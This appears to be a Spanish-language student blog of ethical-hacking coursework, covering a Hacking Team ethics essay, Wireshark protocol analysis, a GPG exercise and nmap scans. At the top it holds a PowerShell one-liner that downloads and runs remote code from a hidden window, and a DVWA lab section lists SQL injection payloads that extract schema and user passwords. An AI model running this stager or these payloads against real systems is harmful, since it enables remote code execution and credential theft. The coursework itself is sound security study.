sábado, 3 de octubre de 2015

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.177.128:80/a'))"

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.177.128:80/a'))"

UNIDAD II - Tarea #3

Debate sobre Ética del Hacker
Hacking Team - Vulnerado


¿Qué opinas sobre la acción realizada contra Hacking Team? ¿Consideras que los hackers se han excedido en sus ‘funciones’?
Hacking Team a abusado de las vulnerabilidades existentes en los sistemas, su trabajo es vender software para atacar, vigilar,robar información,etc. Este software al momento de instalarse en el dispositivo se instala con una backdoor con el fin de conectarse a el remotamente, y poder controlar el dispositivo con los privilegios de superusuario. Todo esto por encargo de clientes como, Gobiernos de distintos Países, Agencias de Inteligencia, Empresas Transaccionales, entre otros, quienes contratan sus servicios para tener el control que necesiten para oscuros propósitos, ya que esto esta totalmente prohibido en muchos países. Esta empresa Hacking Team es un ejemplo claro para poder marcar la diferencial entre el Hacking Ético de los Piratas Informáticos(delincuentes) quienes lucran con la información. Yo pienso que esta muy mal espiar/vigilar a las personas, por que se puede llegar a manipular la información que esta a nuestro alcance en función a a nuestros intereses, e inducir un mensaje subliminal en casos extremos.
¿Cuáles crees que deberían ser los límites del hacker?
Los hackers deberían de ser como un ciudadano mas quien desee que no se abuse de la desinformación de la gente, que genere consciencia entre todos, y que utilice su conocimiento para ayudar a los demás, y no a perjudicar, porque ese poder que se obtiene del aprendizaje lo podemos usar todos para ayudarnos mutuamente.
¿Piensas que la ciudadanía es consciente del rol que los hackers pueden jugar en favor de su propia seguridad en la red detectando aquellos sitios que no son seguros ya sea porque ponen en riesgo los datos de los usuarios o bien porque hacen un uso ilegítimos de los mismos?
Se tiene una idea errónea de lo que es un hacker, no saben que si todos aprendiéramos un poco de lo que es en verdad un hacker seríamos mejores, tendríamos una mayor perspectiva de como funciona el mundo en realidad, como se mueve la información, ¿a donde va?, ¿se pueden hacer cosas importantes en ella?, inconscientemente sabemos que si antes de una pelea hemos estudiado a nuestro adversario tenemos altos indices de vencerlo, esa es una de las tareas básicas de un hacker para poder explotar sistemas aunque sean de grandes entidades, entonces si traspolamos estas disciplinas a la ciudadanía ¿como tomo interpretaríamos?, puede ser un ciudadano contra un pésimo gobierno, o intentando resolver un problema personal.

viernes, 2 de octubre de 2015

UNIDAD II - Tarea #02

TAREA 2: SQL injection

Usa la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos.



Al iniciar la maquina virtual nos arroja la IP eth0 : 192.168.56.101
Debemos ingresar esa IP en nuestro navegador y logearnos.
user: admin
pw: password
IMG1

Al ingresar nos dirigimos en al boton "DVWA Security", para cambiar el nivel de sguridad a "low" y click en Submit.

IMG2

Luego nos vamos a "SQL Injection", para realizar las pruebas.

Iniciamos la Inyección Básica.
Ingresamos "1" y Enviar.

IMG2

Esta es la instrucción que estaremos explotando:



$ getId = "SELECT first_name, last_name FROM usuarios WHERE user_id = '$ id'";



Escenario siempre cierto – Always True Scenario
Sentencia :
mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0′;
Ingresar : %’ or ‘0’=’0


Mostrar versión Base de Datos – Display Database Version

En busca de la versión de la base de datos Mysql.
Sentencia :
%’ or 0=0 union select null, version() #


Mostrar usuario de la Base de Datos – Display Database User
En la última línea PHP y obtenemos el nombre de usuario.
Sentencia :
%’ or 0=0 union select null, user() #


Mostrar nombre Base de Datos – Display Database Name
Al final nos imprime surname: " dvwa" el nombre de la base de datos.
Sentencia :
%’ or 0=0 union select null, database() #


Mostrar todas las tablas de information_schema – Display all tables in information_schema
Information_schema es la base de datos de información, el lugar que almacena información acerca de todas las otras bases de datos que el servidor
MySQL mantiene.
Sentencia :
%’ and 1=0 union select null, table_name from information_schema.tables #


Mostrar todas las tablas de user en information_schema –
Display all the user tables in information_schema
Se muestran todas las tablas que comienzan con “user” en la DB gracias a "information_schema".
Sentencia :
%’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#

Mostrar todos los campos de columnas
en la tabla user en information_schema
Se muestran todas las columnas de la tabla de usuarios.
Sentencia :
%’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ #


Mostrar todos los contenidos de campo de columnas en la tabla de usuario
en information_schema
Información de autenticación para el ingreso a la base de datos.
Sentencia :
%’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

POST FUENTE de GUÍA


UNIDAD II - Tarea #01

Capturando y Analizando tráfico con Wireshark.


Primera parte: analizando un protocolo inseguro - Telnet.

En este caso, vamos a usar la traza telnet-raw.pcap, del repositorio de capturas disponible en Wireshark.

Analizando los paquetes con la opción Follow TCP Stream podemos acceder a información fácilmente ya que el puerto de TELNET es inseguro, porque la información no viaja cifrada. 

  • ¿Qué usuario y contraseña se ha utilizado para acceder al servidor de Telnet?
Podemos ver que el login tiene un par de caracteres por cada caracter, esto es por que tanto como el servidor como el cliente hacen el intercambios para así poder validar al usuario.
LOGIN: fake
  • ¿Qué sistema operativo corre en la máquina?

    Corre con el sistema operativo 
    OpenBSD de 32Bits.
  • ¿Qué comandos se ejecutan en esta sesión?

    El protocolo de telnet nos devuelve todos los comandos usados utilizados como si los estuviera leyendo desde la misma consola.
    También observamos que se duplican los caracteres debido a la comunicación entre el cliente y el servidor.
  • ls
  • ls - a /sbin/ping www.yahoo.com
  • ping www.yahoo.com (204.71.200.74): 56 data bytes
  • ^C
  • exit




Segunda parte: analizando SSL.

Para la realización de este ejercicio, descarga esta traza con tráfico SSL y ábrela con Wireshark. SSL es un protocolo seguro que utilizan otros protocolos de aplicación como HTTP. Usa certificados digitales X.509 para asegurar la conexión.
  • ¿Puedes identificar en qué paquete de la trama el servidor envía el certificado?
Analizando el orden de los paquetes y analizando la información de cada uno podemos llegar fácilmente al primer paquete en que se envía el certificado. 
  • ¿El certificado va en claro o está cifrado? ¿Puedes ver, por ejemplo, qué autoridad ha emitido el certificado?
El certificado va totalmente cifrado, como podemos ver en los paquetes posteriores al envió del certificado se hace el intercambios de llaves publicas( Keys Exchange), y se realiza el HandShake para el cifrado y descifrado entre las partes.



  • ¿Qué asegura el certificado, la identidad del servidor o del cliente?
Desplegando la información obtenida del paquete poner determinar la identidad de la organización encargada de garantizar la seguridad del protocolo.

url: www.verisign.com
organización: RSA Data Security Inc.










Tercera parte: analizando SSH.

En la primera parte de este ejercicio hemos visto un protocolo no seguro, como Telnet. Una alternativa a usar Telnet a la hora de conectarnos a máquinas remotas es SSH, que realiza una negociación previa al intercambio de datos de usuario. A partir de esta negociación, el tráfico viaja cifrado. Descarga esta traza con tráfico SSH y abrela con Wireshark.
  • ¿Puedes ver a partir de qué paquete comienza el tráfico cifrado?
Siguiendo el orden de captura, comienza a partir del paquete 20 
  • ¿Qué protocolos viajan cifrados, todos (IP, TCP...) o alguno en particular?
Todos los protocolos van cifrados. 
  • ¿Es posible ver alguna información de usuario como contraseñas de acceso?
 No hay ningún usuario/contraseña por ningún lado, todo esta cifrado.





sábado, 26 de septiembre de 2015

TAREA N°3  CRIPTOGRAFÍA

1-)Intercambio de claves y archivos
Mi clave pública: 






2-)Proceso realizado.

http://es.slideshare.net/8enja/kleo






Cifrar y descifrar un archivo con Kleopatra (Gpg4win)
¿Cómo ciframos el mapa del tesoro?
Vamos a crear nuestro certificado...
Para crear nuestra llave privada, elegimos “Make a Backup…” y seleccionamos
una carpeta para guardarla:
Se ha creado un ar...
Ahora crearemos la llave pública, vamos a “Exportar certificados” :
Y tendremos nuestra llave pública:
Para verificar, cre...
Verificamos los archivos:
Ya tengo mis llaves, las probaré.
Voy a cifrar y descifrar un archivo, en este caso es mapa del ...
Hemos creado un archivo SIG. Verificamos la firma :
No hay problema con la firma
Ahora vamos a cifrar (o encriptar) el arc...
Seleccionamos nuestra llave con el botón ADD.
Y nos crea el archivo cifrado de tipo GPG:
Descifrar el archivo GPG es fácil...
Usemos la llave pública de los demás.
La criptografía de llave pública tiene ciertas ventajas al tener una llave
privada y...
Verifico mi firma:
Ahora sí, a cifrar (o encriptar) el mapa del tesoro:
Ahora sólo tengo que seleccionar la llave de Belén y agregarla:
Ahora puedo enviarle el mapa cifrado a Belén; lo descifrar...

Próxima SlideShare
Cargando en...5
×

viernes, 25 de septiembre de 2015


TAREA N° 02 Links de interés. 


1- Organización mexicana de Hackers Éticos. El creador de la web Héctor López, publica diversos vídeo tutoriales y conferencias sobre herramientas de pentesting en general.
OMHE
2-Información variada sobre seguridad, vulnerabilidades y hacking.
http://www.seguridadparatodos.es/
3- Grupo de intercambio de información en Facebook. Tutoriales - Actualizaciones - Debates, e intercambio de información.
https://www.facebook.com/groups/467783429968410/
Gracias!!!

miércoles, 23 de septiembre de 2015

TAREA 01 ping-whois-nmap


Con el segundo hots pude llegar mas lejos:google.es

Todo lo hice en BackBox - Ubuntu 14.04.3 LTS.

1- Primero la búsqueda de la IP.



2- Hice la busqueda de información de la IP con WHOIS bajo consola, con informacion de su ubucación, telefonos de oficina, correos, códigos postales, etc.



3-Seguí con la búsqueda de puertos abiertos con distintas opciones de nmap.
-Con el se consigue saber que puertos se encuentran abiertos.
80/tcp open
443/tcp open



Con nmap y la opcion -A obtuve nuevamente los puertos que estan abiertos y también un sistema operativo, al parecer es el del router, o del hots, no se identificarlo, me quede con esa duda:
-Linux 2.6 de 32bits



root@WARNING-Rev-1-0:/home/war# nmap -A 216.58.219.163
Device type: router|WAP|general purpose|printer
Running (JUST GUESSING): Asus Linux 2.6.X (86%), Linux 2.6.X (86%), OpenBSD 4.X (86%), Lexmark embedded (86%)
OS CPE: cpe:/o:asus:linux_kernel:2.6 cpe:/h:asus:rt-n16 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:openbsd:openbsd:4.3 cpe:/h:lexmark:x644e
Aggressive OS guesses: Asus RT-AC66U router (Linux 2.6) (86%), Asus RT-N16 WAP (Linux 2.6) (86%), Asus RT-N66U WAP (Linux 2.6) (86%), Tomato 1.28 (Linux 2.6.22) (86%), OpenBSD 4.3 (86%), Lexmark X644e printer (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 4567/tcp)
HOP RTT      ADDRESS
1   14.59 ms mia07s27-in-f3.1e100.net (216.58.219.163)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.78 seconds
root@WARNING-Rev-1-0:/home/war#


Luego deje la consola y lo intente con la interfaz grafica con el perfil de  QuickTraceRoute y el scan me arrojo diversas IP's.


De las cuales la tercera 10.112.47.33 pude obtener otra ruta mas con la opción Intense scan, con este pude encontrar 3 puertos mas abiertos.
 




La verdad muy interesante estas herramientas, espero conocer y aprender muchas otras.